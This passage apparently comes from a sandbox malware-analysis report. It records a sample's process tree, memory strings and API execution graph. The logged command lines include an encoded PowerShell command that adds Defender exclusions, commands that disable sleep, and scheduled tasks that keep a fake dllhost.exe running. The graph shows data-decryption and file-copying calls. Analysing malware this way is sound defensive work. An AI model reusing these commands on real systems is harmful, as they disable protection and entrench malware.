                                                                                                                                                                                                            Commandline:"cmd.exe" /C powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                                                                                                                                                                                                            Imagebase:0xd70000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                            Start time:06:20:11
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff620390000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                            Start time:06:20:11
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A"
                                                                                                                                                                                                            Imagebase:0x30000
                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                            Start time:06:20:12
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                            Imagebase:0x7ff6616b0000
                                                                                                                                                                                                            File size:496'640 bytes
                                                                                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                            Start time:06:20:14
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                                                                                                                                                            Imagebase:0xc10000
                                                                                                                                                                                                            File size:78'336 bytes
                                                                                                                                                                                                            MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                            Start time:06:20:14
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                                                                                                                                                            Imagebase:0xc10000
                                                                                                                                                                                                            File size:78'336 bytes
                                                                                                                                                                                                            MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                            Start time:06:20:14
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:powercfg /x -standby-timeout-ac 0
                                                                                                                                                                                                            Imagebase:0xc10000
                                                                                                                                                                                                            File size:78'336 bytes
                                                                                                                                                                                                            MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                            Start time:06:20:15
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:powercfg /x -standby-timeout-dc 0
                                                                                                                                                                                                            Imagebase:0xc10000
                                                                                                                                                                                                            File size:78'336 bytes
                                                                                                                                                                                                            MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                            Start time:06:20:15
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\powercfg.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:powercfg /hibernate off
                                                                                                                                                                                                            Imagebase:0xc10000
                                                                                                                                                                                                            File size:78'336 bytes
                                                                                                                                                                                                            MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                            Start time:06:20:15
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                                                                                                                                                            Imagebase:0xd70000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                            Start time:06:20:15
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4013" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                                                                                                                                                            Imagebase:0xd70000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                            Start time:06:20:15
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff620390000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                            Start time:06:20:15
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff620390000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                            Start time:06:20:15
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                                                            File size:187'904 bytes
                                                                                                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                            Start time:06:20:15
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4013" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                                                            File size:187'904 bytes
                                                                                                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Reset < >
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000007.00000003.1799258443.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false
                                                                                                                                                                                                              • Associated: 00000007.00000003.1667671024.0000000002EC1000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_7_3_2ec1000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: c
                                                                                                                                                                                                              • API String ID: 0-112844655
                                                                                                                                                                                                              • Opcode ID: 86e19fdc7147c3915b7eef380b5213e8f54ad200df4fed6ef4df4db9c02a18e1
                                                                                                                                                                                                              • Instruction ID: ed7eb96b3a95c254bb21484269f02b809798e269c5397cd6ba913406d173b924
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86e19fdc7147c3915b7eef380b5213e8f54ad200df4fed6ef4df4db9c02a18e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0271022284E3C18FDB13CB74855AB96BFF0AF13318F5985DEC4C11E0A3D6A6614AE742
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000007.00000003.1799258443.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, Offset: 02EC5000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_7_3_2ec1000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: c
                                                                                                                                                                                                              • API String ID: 0-112844655
                                                                                                                                                                                                              • Opcode ID: 22ad33ddcd3bc30fc1676cd55618ee9a13b0e93534f0b0a4efbc6f8f6583a507
                                                                                                                                                                                                              • Instruction ID: ed7eb96b3a95c254bb21484269f02b809798e269c5397cd6ba913406d173b924
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22ad33ddcd3bc30fc1676cd55618ee9a13b0e93534f0b0a4efbc6f8f6583a507
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0271022284E3C18FDB13CB74855AB96BFF0AF13318F5985DEC4C11E0A3D6A6614AE742
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000007.00000003.1799258443.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, Offset: 02EC5000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_7_3_2ec1000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 58eb8312e8e3efbe973e3d91bebd0c6f642809eae04c2a78959e615e506de88a
                                                                                                                                                                                                              • Instruction ID: a01f8a064727f63c2434c8393b0f8c5c595cfcf777a1f3e1f6982ed8bea7b41c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58eb8312e8e3efbe973e3d91bebd0c6f642809eae04c2a78959e615e506de88a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA31EE3104A3D09FC71B8FB4C955A827FB4BF03318B6981DED4829F067C320614AD796
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000007.00000003.1799258443.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false
                                                                                                                                                                                                              • Associated: 00000007.00000003.1667671024.0000000002EC1000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_7_3_2ec1000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: acbdd5749257df657923b26583924f6ab7d72e8eac0452f0cc215e36b3eb71ba
                                                                                                                                                                                                              • Instruction ID: 9d77bc0a0c345ef8596b3dcb78d1fbe05ae4981a5f398e31686a0511212022e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: acbdd5749257df657923b26583924f6ab7d72e8eac0452f0cc215e36b3eb71ba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E031D03104A3D49FC7168FB4C955A82BFB4BF43318B6981DEE4819F067C370664ADB96
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000007.00000003.1799258443.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, Offset: 02EC5000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_7_3_2ec1000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 30562b4d9b9484b1308408e6c071fc39217ae341f1e69b222014acb719f7c6d4
                                                                                                                                                                                                              • Instruction ID: 00a79d2b7604edb44109850be856248cfa0723e367ef5ea65b41e92f167de2d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30562b4d9b9484b1308408e6c071fc39217ae341f1e69b222014acb719f7c6d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA31AD3148A7D49FC71B8FB4C955A86BFB4BF03318B6981DEE4825F127D321624ADB81
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000007.00000003.1799258443.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, Offset: 02EC5000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_7_3_2ec1000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c2d5098484a4c7f891b2c4f3a2c0048ab1a3c8a9e235406ba8cb0ea0a4aed967
                                                                                                                                                                                                              • Instruction ID: b06a6774a4760f2ff16f5a776d3edc63e963e6667ce00565a843676ccf73bc7d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2d5098484a4c7f891b2c4f3a2c0048ab1a3c8a9e235406ba8cb0ea0a4aed967
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B31BA3108A3949FC71A8FB4C955A86BFB4BF03314B6981DEE4815E127D231524ADB81
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000007.00000003.1799258443.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false
                                                                                                                                                                                                              • Associated: 00000007.00000003.1667671024.0000000002EC1000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_7_3_2ec1000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 84b9e0be69ab2d7df9bcbd4b4f2139c71ad8f24c89601b860202ad2f1624e12f
                                                                                                                                                                                                              • Instruction ID: 57dc390158ca9ca8ce74b17901b4a0c940789f08bfcef377d8eaadac518f4375
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84b9e0be69ab2d7df9bcbd4b4f2139c71ad8f24c89601b860202ad2f1624e12f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B231BE3148A3D49FC7068FB4C955A86BFB4BF43314B6941DEE4C19F167C360564ADB81
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000007.00000003.1799258443.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false
                                                                                                                                                                                                              • Associated: 00000007.00000003.1667671024.0000000002EC1000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_7_3_2ec1000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: def3c5192673f36377b5d44e609c2957ea103de852a1fcdee42b4a884c316858
                                                                                                                                                                                                              • Instruction ID: 66f54de32bc72ee84959e2ee268cb0653445df5515286f3587007b970179a85f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: def3c5192673f36377b5d44e609c2957ea103de852a1fcdee42b4a884c316858
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD31AB3148A3949FC706CFB4CA55A86BFB4BF43324B2981DEE4819F167C370564ADB81
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000007.00000003.1799258443.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false
                                                                                                                                                                                                              • Associated: 00000007.00000003.1667671024.0000000002EC1000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_7_3_2ec1000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c59a6f6b0db5fda5bd2523581747c6299bf87a0cbafb7135e40e7cb8f25489b9
                                                                                                                                                                                                              • Instruction ID: cb8b2f295756254f87cffaf80e81f312f21918c9bbc83bee72d874dbdecd0397
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c59a6f6b0db5fda5bd2523581747c6299bf87a0cbafb7135e40e7cb8f25489b9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A831CB2640E3D18EDB13CB70859AB92BFF0AF03314F5995CFC4955E0A3D676214AE752
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000007.00000003.1799258443.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, Offset: 02EC5000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_7_3_2ec1000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 228589b6bb2d9ebc4d3331ce8454e38d17c3f9015dee0159c9fc8bf9d232406b
                                                                                                                                                                                                              • Instruction ID: cb8b2f295756254f87cffaf80e81f312f21918c9bbc83bee72d874dbdecd0397
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 228589b6bb2d9ebc4d3331ce8454e38d17c3f9015dee0159c9fc8bf9d232406b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A831CB2640E3D18EDB13CB70859AB92BFF0AF03314F5995CFC4955E0A3D676214AE752

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:13.1%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                              Signature Coverage:29.6%
                                                                                                                                                                                                              Total number of Nodes:257
                                                                                                                                                                                                              Total number of Limit Nodes:13
                                                                                                                                                                                                              execution_graph 13082 7706d704 CoInitializeSecurity 13162 77098e4a 13163 77098e90 13162->13163 13165 77099a2e 13163->13165 13166 77098a80 LdrInitializeThunk 13163->13166 13166->13165 13167 7706dcc2 13168 7706dcd0 13167->13168 13195 77061b90 13168->13195 13170 7706ddc7 13171 77068f20 ExitProcess 13170->13171 13172 7706ddd6 13171->13172 13173 7707e110 GetLogicalDrives GetLogicalDrives RtlAllocateHeap LdrInitializeThunk 13172->13173 13174 7706dddc 13173->13174 13175 77068f20 ExitProcess 13174->13175 13176 7706ddf2 13175->13176 13177 77068f20 ExitProcess 13176->13177 13178 7706de0e 13177->13178 13179 7707ecb0 RtlAllocateHeap LdrInitializeThunk 13178->13179 13180 7706de14 13179->13180 13181 77068f20 ExitProcess 13180->13181 13182 7706de2a 13181->13182 13183 77081150 RtlAllocateHeap LdrInitializeThunk 13182->13183 13184 7706de39 13183->13184 13185 77081600 CopyFileW RtlAllocateHeap LdrInitializeThunk 13184->13185 13186 7706de42 13185->13186 13187 770842e0 LdrInitializeThunk 13186->13187 13188 7706de4b 13187->13188 13189 77068f20 ExitProcess 13188->13189 13190 7706de61 13189->13190 13191 77068f20 ExitProcess 13190->13191 13192 7706de7d 13191->13192 13193 7708dda0 6 API calls 13192->13193 13194 7706de8c 13193->13194 13196 77061b9e 13195->13196 13199 77061cac 13195->13199 13197 77061c69 13196->13197 13200 77061bb3 13196->13200 13203 77061c1d 13196->13203 13201 77061b90 RtlFreeHeap 13197->13201 13197->13203 13198 77061bf3 13206 77095592 13198->13206 13200->13198 13200->13199 13202 77061b90 RtlFreeHeap 13200->13202 13201->13197 13202->13200 13205 77095592 RtlFreeHeap 13203->13205 13205->13199 13207 770955a0 RtlFreeHeap 13206->13207 13208 770955e5 13206->13208 13207->13208 13208->13203 13083 7707a502 13084 7707a510 13083->13084 13088 7709c7e0 13084->13088 13086 7707a566 13087 7709c7e0 LdrInitializeThunk 13086->13087 13087->13086 13089 7709c800 13088->13089 13090 7709c8fe 13089->13090 13092 77098a80 LdrInitializeThunk 13089->13092 13090->13086 13092->13090 13210 7707c140 13211 7707c14e 13210->13211 13215 7707c190 13210->13215 13216 7707c250 13211->13216 13213 7707c20c 13214 7707a700 LdrInitializeThunk 13213->13214 13213->13215 13214->13215 13217 7707c260 13216->13217 13217->13217 13218 7709c7e0 LdrInitializeThunk 13217->13218 13219 7707c35f 13218->13219 13220 7708a7cf 13223 77073830 13220->13223 13222 7708a7d4 CoSetProxyBlanket 13223->13222 13224 77092a40 13225 77092a68 13224->13225 13229 77092b31 13225->13229 13233 77098a80 LdrInitializeThunk 13225->13233 13227 77092d34 13229->13227 13230 77092c23 13229->13230 13232 77098a80 LdrInitializeThunk 13229->13232 13230->13227 13234 77098a80 LdrInitializeThunk 13230->13234 13232->13229 13233->13225 13234->13230 13093 77075889 13095 77075890 13093->13095 13094 77075a0e CryptUnprotectData 13095->13094 13235 77070449 13237 7707046c 13235->13237 13236 77068f20 ExitProcess 13238 7706e864 13236->13238 13237->13236 13237->13238 13239 770756c8 13242 770756c1 13239->13242 13242->13239 13242->13242 13244 77075a70 13242->13244 13245 7709c950 13242->13245 13249 7709ca00 13242->13249 13255 77098a80 LdrInitializeThunk 13242->13255 13244->13244 13247 7709c970 13245->13247 13246 7709c9ae 13246->13242 13247->13246 13256 77098a80 LdrInitializeThunk 13247->13256 13250 7709ca30 13249->13250 13253 7709ca6e 13250->13253 13257 77098a80 LdrInitializeThunk 13250->13257 13251 7709cafe 13251->13242 13253->13251 13258 77098a80 LdrInitializeThunk 13253->13258 13255->13242 13256->13246 13257->13253 13258->13251 13259 7706e357 13260 7706e35d 13259->13260 13265 77071550 13260->13265 13263 77061b90 RtlFreeHeap 13264 7706e36f 13263->13264 13272 77071569 13265->13272 13266 7706e366 13266->13263 13267 77072cab CreateProcessW 13267->13272 13268 770688e0 ExitProcess 13268->13272 13269 77098a80 LdrInitializeThunk 13269->13272 13272->13266 13272->13267 13272->13268 13272->13269 13273 7709c4b0 13272->13273 13277 7709cb50 13272->13277 13275 7709c4d0 13273->13275 13274 7709c5ee 13274->13272 13275->13274 13283 77098a80 LdrInitializeThunk 13275->13283 13278 7709cb80 13277->13278 13281 7709cbbe 13278->13281 13284 77098a80 LdrInitializeThunk 13278->13284 13280 7709cc4e 13280->13272 13281->13280 13285 77098a80 LdrInitializeThunk 13281->13285 13283->13274 13284->13281 13285->13280 13286 7706d6d7 13287 7706d6e1 13286->13287 13288 7706d6e6 13287->13288 13289 7706d671 CoInitializeEx 13287->13289 13289->13286 13290 77086c5a 13291 77086c64 13290->13291 13291->13291 13292 77088605 GetPhysicallyInstalledSystemMemory 13291->13292 13293 77088629 13292->13293 13293->13293 13096 7708829c 13097 770882f0 13096->13097 13097->13097 13098 770883ee 13097->13098 13100 77098a80 LdrInitializeThunk 13097->13100 13100->13098 13294 7708e2dc 13295 7708e2e1 13294->13295 13296 7708e317 GetSystemMetrics GetSystemMetrics 13295->13296 13297 7708e356 13296->13297 13298 7708725d 13300 7708727c 13298->13300 13299 7708733b FreeLibrary 13301 7708734d 13299->13301 13300->13299 13302 7708735d GetComputerNameExA 13301->13302 13303 770873b0 GetComputerNameExA 13302->13303 13305 770874d0 13303->13305 13101 77099191 13103 770990c2 13101->13103 13102 7709921f 13103->13101 13103->13102 13106 77098a80 LdrInitializeThunk 13103->13106 13105 77099247 13106->13105 13107 7706dea6 13108 7706deac 13107->13108 13109 7706deb6 CoUninitialize 13108->13109 13110 7706def0 13109->13110 13111 77098cab 13112 77098cc0 13111->13112 13115 77098a80 LdrInitializeThunk 13112->13115 13114 7709905c 13115->13114 13306 77098deb GetForegroundWindow 